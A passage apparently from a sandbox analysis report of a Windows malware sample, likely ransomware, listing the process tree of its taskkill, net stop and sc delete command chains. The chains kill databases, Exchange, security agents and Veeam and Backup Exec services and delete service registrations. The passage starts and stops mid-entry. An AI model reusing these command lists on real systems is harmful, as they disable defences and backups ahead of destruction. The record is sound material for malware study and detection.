360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
4⤵
PID:2636

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlservr.exe /F
5⤵
PID:5968

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM httpd.exe /F
5⤵
PID:4748

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM java.exe /F
5⤵
PID:6832

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdhost.exe /F
5⤵
PID:6104

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM fdlauncher.exe /F
5⤵
PID:272

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM reportingservicesservice.exe /F
5⤵
PID:5360

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM softmgrlite.exe /F
5⤵
PID:4620

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlbrowser.exe /F
5⤵
PID:6556

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ssms.exe /F
5⤵
PID:6748

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vmtoolsd.exe /F
5⤵
PID:6516

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM baidunetdisk.exe /F
5⤵
PID:6940

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ssclient.exe /F
5⤵
PID:4120

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM yundetectservice.exe /F
5⤵
PID:5268

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GNAupdaemon.exe /F
5⤵
PID:1740

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM RAVCp164.exe /F
5⤵
PID:2652

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxEM.exe /F
5⤵
PID:788

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxHK.exe /F
5⤵
PID:4212

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM igfxTray.exe /F
5⤵
PID:5820

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM 360bdoctor.exe /F
5⤵
- Kills process with taskkill
PID:5540

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM GNCEFExternal.exe /F
5⤵
PID:4872

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM PrivacyIconClient.exe /F
5⤵
PID:3980

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM UIODetect.exe /F
5⤵
PID:4128

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM AutoDealService.exe /F
5⤵
PID:5368

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
4⤵
PID:4028

C:\Windows\SysWOW64\net.exe
net stop UIODetect
5⤵
PID:4688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UIODetect
6⤵
PID:5284

C:\Windows\SysWOW64\net.exe
net stop VMwareHostd
5⤵
PID:2300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
6⤵
PID:5684

C:\Windows\SysWOW64\net.exe
net stop TeamViewer8
5⤵
- Discovers systems in the same network
PID:3676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
6⤵
PID:1008

C:\Windows\SysWOW64\net.exe
net stop VMUSBArbService
5⤵
PID:6812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMUSBArbService
6⤵
PID:6648

C:\Windows\SysWOW64\net.exe
net stop VMAuthdService
5⤵
PID:6436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMAuthdService
6⤵
PID:4364

C:\Windows\SysWOW64\net.exe
net stop wanxiao-monitor
5⤵
PID:5536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wanxiao-monitor
6⤵
PID:7152

C:\Windows\SysWOW64\net.exe
net stop WebAttendServer
5⤵
PID:7068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WebAttendServer
6⤵
PID:4888

C:\Windows\SysWOW64\net.exe
net stop mysqltransport
5⤵
PID:6384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mysqltransport
6⤵
PID:4780

C:\Windows\SysWOW64\net.exe
net stop VMnetDHCP
5⤵
PID:5332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMnetDHCP
6⤵
PID:6336

C:\Windows\SysWOW64\net.exe
net stop "VMware NAT Service"
5⤵
PID:6636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
6⤵
PID:6168

C:\Windows\SysWOW64\net.exe
net stop Tomcat8
5⤵
PID:6724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Tomcat8
6⤵
PID:6216

C:\Windows\SysWOW64\net.exe
net stop TeamViewer
5⤵
- Discovers systems in the same network
PID:7100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer
6⤵
PID:6972

C:\Windows\SysWOW64\net.exe
net stop QPCore
5⤵
PID:6788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QPCore
6⤵
PID:6872

C:\Windows\SysWOW64\net.exe
net stop CASLicenceServer
5⤵
PID:5396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASLicenceServer
6⤵
PID:252

C:\Windows\SysWOW64\net.exe
net stop CASWebServer
5⤵
PID:6052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASWebServer
6⤵
PID:4888

C:\Windows\SysWOW64\net.exe
net stop AutoUpdateService
5⤵
PID:5740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AutoUpdateService
6⤵
PID:4780

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Detect Service"
5⤵
PID:4904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
6⤵
PID:6488

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Update Service"
5⤵
PID:6316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
6⤵
PID:5100

C:\Windows\SysWOW64\net.exe
net stop "AliyunService"
5⤵
PID:1564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AliyunService"
6⤵
PID:6760

C:\Windows\SysWOW64\net.exe
net stop CASXMLService
5⤵
PID:5900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASXMLService
6⤵
PID:6768

C:\Windows\SysWOW64\net.exe
net stop AGSService
5⤵
PID:6436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AGSService
6⤵
PID:6640

C:\Windows\SysWOW64\net.exe
net stop RapService
5⤵
PID:5792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapService
6⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net stop DDNSService
5⤵
PID:5524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DDNSService
6⤵
PID:4156

C:\Windows\SysWOW64\net.exe
net stop iNethinkSQLBackupSvc
5⤵
PID:5824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
6⤵
PID:6836

C:\Windows\SysWOW64\net.exe
net stop CASVirtualDiskService
5⤵
PID:5248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASVirtualDiskService
6⤵
PID:1740

C:\Windows\SysWOW64\net.exe
net stop CASMsgSrv
5⤵
PID:5280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASMsgSrv
6⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
4⤵
PID:1632

C:\Windows\SysWOW64\net.exe
net stop HaoZipSvc
5⤵
PID:1728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HaoZipSvc
6⤵
PID:4620

C:\Windows\SysWOW64\net.exe
net stop "igfxCUIService2.0.0.0"
5⤵
PID:6412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
6⤵
PID:5192

C:\Windows\SysWOW64\net.exe
net stop Realtek11nSU
5⤵
PID:5896

C:\Windows\SysWOW64\net.exe
net stop xenlite
5⤵
PID:6596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop xenlite
6⤵
PID:6640

C:\Windows\SysWOW64\net.exe
net stop XenSvc
5⤵
PID:7112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop XenSvc
6⤵
PID:696

C:\Windows\SysWOW64\net.exe
net stop Apache2.2
5⤵
PID:4452

C:\Windows\SysWOW64\net.exe
net stop "Synology Drive VSS Service x64"
5⤵
PID:5520

C:\Windows\SysWOW64\net.exe
net stop DellDRLogSvc
5⤵
PID:4160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DellDRLogSvc
6⤵
PID:3404

C:\Windows\SysWOW64\net.exe
net stop FirebirdGuardianDeafaultInstance
5⤵
PID:4804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
6⤵
PID:6632

C:\Windows\SysWOW64\net.exe
net stop JWEM3DBAUTORun
5⤵
PID:6008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWEM3DBAUTORun
6⤵
PID:4460

C:\Windows\SysWOW64\net.exe
net stop JWRinfoClientService
5⤵
PID:7052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWRinfoClientService
6⤵
PID:6932

C:\Windows\SysWOW64\net.exe
net stop JWService
5⤵
PID:6880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWService
6⤵
PID:6868

C:\Windows\SysWOW64\net.exe
net stop Service2
5⤵
PID:740

C:\Windows\SysWOW64\net.exe
net stop RapidRecoveryAgent
5⤵
PID:5708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapidRecoveryAgent
6⤵
PID:5576

C:\Windows\SysWOW64\net.exe
net stop FirebirdServerDefaultInstance
5⤵
PID:6924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
6⤵
PID:5436

C:\Windows\SysWOW64\net.exe
net stop AdobeARMservice
5⤵
PID:5612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AdobeARMservice
6⤵
PID:5500

C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc
5⤵
PID:5316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc
6⤵
PID:6260

C:\Windows\SysWOW64\net.exe
net stop VeeanBackupSvc
5⤵
PID:5700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeanBackupSvc
6⤵
PID:3396

C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc
5⤵
PID:6680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc
6⤵
PID:3724

C:\Windows\SysWOW64\net.exe
net stop TPlusStdAppService1300
5⤵
PID:5168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdAppService1300
6⤵
PID:6976

C:\Windows\SysWOW64\net.exe
net stop TPlusStdTaskService1300
5⤵
PID:5224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdTaskService1300
6⤵
PID:7112

C:\Windows\SysWOW64\net.exe
net stop TPlusStdUpgradeService1300
5⤵
PID:3532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
6⤵
PID:4108

C:\Windows\SysWOW64\net.exe
net stop TPlusStdWebService1300
5⤵
PID:6988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdWebService1300
6⤵
PID:6476

C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc
5⤵
PID:1348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc
6⤵
PID:5844

C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc
5⤵
PID:6116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc
6⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
4⤵
PID:6136

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService1
5⤵
PID:5140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService1
6⤵
PID:1228

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService2
5⤵
PID:588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService2
6⤵
PID:6028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeCompliance
6⤵
PID:5072

C:\Windows\SysWOW64\net.exe
net stop "memcached Server"
5⤵
PID:5872

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
5⤵
PID:292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
6⤵
PID:6628

C:\Windows\SysWOW64\net.exe
net stop UFIDAWebService
5⤵
PID:5860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UFIDAWebService
6⤵
PID:2688

C:\Windows\SysWOW64\net.exe
net stop MSComplianceAudit
5⤵
PID:3980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSComplianceAudit
6⤵
PID:5956

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
5⤵
PID:6208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
6⤵
PID:5504

C:\Windows\SysWOW64\net.exe
net stop MSExchangeAntispamUpdate
5⤵
PID:396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
6⤵
PID:4720

C:\Windows\SysWOW64\net.exe
net stop MSExchangeCompliance
5⤵
PID:588

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDagMgmt
5⤵
PID:5952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDagMgmt
6⤵
PID:628

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDelivery
5⤵
PID:5352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDelivery
6⤵
PID:6256

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDiagnostics
5⤵
PID:3500

C:\Windows\SysWOW64\net.exe
net stop MSExchangeEdgeSync
5⤵
PID:5056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeEdgeSync
6⤵
PID:7164

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFastSearch
5⤵
PID:5244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFastSearch
6⤵
PID:1056

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFrontEndTransport
5⤵
PID:4960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
6⤵
PID:1128

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHM
5⤵
PID:7080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHM
6⤵
PID:6036

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL2008
5⤵
PID:6676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL2008
6⤵
PID:6772

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHMRecovery
5⤵
PID:4748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHMRecovery
6⤵
PID:6984

C:\Windows\SysWOW64\net.exe
net stop MSExchangeImap4
5⤵
PID:6540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeImap4
6⤵
PID:3996

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIMAP4BE
5⤵
PID:6944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIMAP4BE
6⤵
PID:7048

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
5⤵
PID:5028

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
6⤵
PID:2008

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxAssistants
5⤵
PID:5200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
6⤵
PID:4208

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxReplication
5⤵
PID:1060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxReplication
6⤵
PID:5708

C:\Windows\SysWOW64\net.exe
net stop MSExchangeNotificationsBroker
5⤵
PID:4860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
6⤵
PID:5416

C:\Windows\SysWOW64\cmd.exe
cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
4⤵
PID:936

C:\Windows\SysWOW64\sc.exe
sc delete MSCRMAsyncService
5⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
4⤵
PID:260

C:\Windows\SysWOW64\sc.exe
sc delete "UWS LoPriv Services"
5⤵
PID:2292

C:\Windows\SysWOW64\sc.exe
sc delete ftnlsv3
5⤵
PID:2096

C:\Windows\SysWOW64\sc.exe
sc delete ftnlses3
5⤵
PID:4328

C:\Windows\SysWOW64\sc.exe
sc delete FxService
5⤵
PID:4996

C:\Windows\SysWOW64\sc.exe
sc delete "UtilDev Web Server Pro"
5⤵
PID:5700

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdwks
5⤵
PID:196

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdsrv
5⤵
- Launches sc.exe
PID:7060

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client Guard"
5⤵
PID:6908

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client"
5⤵
PID:5820

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE FileTranS"
5⤵
PID:4820

C:\Windows\SysWOW64\sc.exe
sc delete wwbizsrv
5⤵
PID:5540

C:\Windows\SysWOW64\sc.exe
sc delete qemu-ga
5⤵
PID:3356

C:\Windows\SysWOW64\sc.exe
sc delete AlibabaProtect
5⤵
- Launches sc.exe
PID:6364

C:\Windows\SysWOW64\sc.exe
sc delete ZTEVdservice
5⤵
PID:6476

C:\Windows\SysWOW64\sc.exe
sc delete kbasesrv
5⤵
PID:3188

C:\Windows\SysWOW64\sc.exe
sc delete MMRHookService
5⤵
PID:5292

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
5⤵
PID:5844

C:\Windows\SysWOW64\sc.exe
sc delete IpOverUsbSvc
5⤵
PID:4960

C:\Windows\SysWOW64\sc.exe
sc delete MsDtsServer100
5⤵
PID:5644

C:\Windows\SysWOW64\sc.exe
sc delete KuaiYunTools
5⤵
PID:5720

C:\Windows\SysWOW64\sc.exe
sc delete KMSELDI
5⤵
PID:5888

C:\Windows\SysWOW64\sc.exe
sc delete btPanel
5⤵
PID:5412

C:\Windows\SysWOW64\sc.exe
sc delete Protect_2345Explorer
5⤵
PID:7148

C:\Windows\SysWOW64\sc.exe
sc delete 2345PicSvc
5⤵
PID:6968

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-agent
5⤵
PID:2544

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-server
5⤵
PID:5832

C:\Windows\SysWOW64\sc.exe
sc delete vmware-converter-worker
5⤵
PID:416

C:\Windows\SysWOW64\sc.exe
sc delete QQCertificateService
5⤵
PID:7012

C:\Windows\SysWOW64\sc.exe
sc delete OracleRemExecService
5⤵
- Launches sc.exe
PID:5148

C:\Windows\SysWOW64\sc.exe
sc delete GPSDaemon
5⤵
PID:4408

C:\Windows\SysWOW64\sc.exe
sc delete GPSUserSvr
5⤵
- Launches sc.exe
PID:6340

C:\Windows\SysWOW64\sc.exe
sc delete GPSDownSvr
5⤵
PID:5420

C:\Windows\SysWOW64\sc.exe
sc delete GPSStorageSvr
5⤵
PID:5512

C:\Windows\SysWOW64\sc.exe
sc delete GPSDataProcSvr
5⤵
- Launches sc.exe
PID:2716

C:\Windows\SysWOW64\sc.exe
sc delete GPSGatewaySvr
5⤵
PID:1628

C:\Windows\SysWOW64\sc.exe
sc delete GPSMediaSvr
5⤵
PID:6336

C:\Windows\SysWOW64\sc.exe
sc delete GPSLoginSvr
5⤵
PID:5644

C:\Windows\SysWOW64\sc.exe
sc delete GPSTomcat6
5⤵
PID:4148

C:\Windows\SysWOW64\sc.exe
sc delete GPSMysqld
5⤵
PID:6348

C:\Windows\SysWOW64\sc.exe
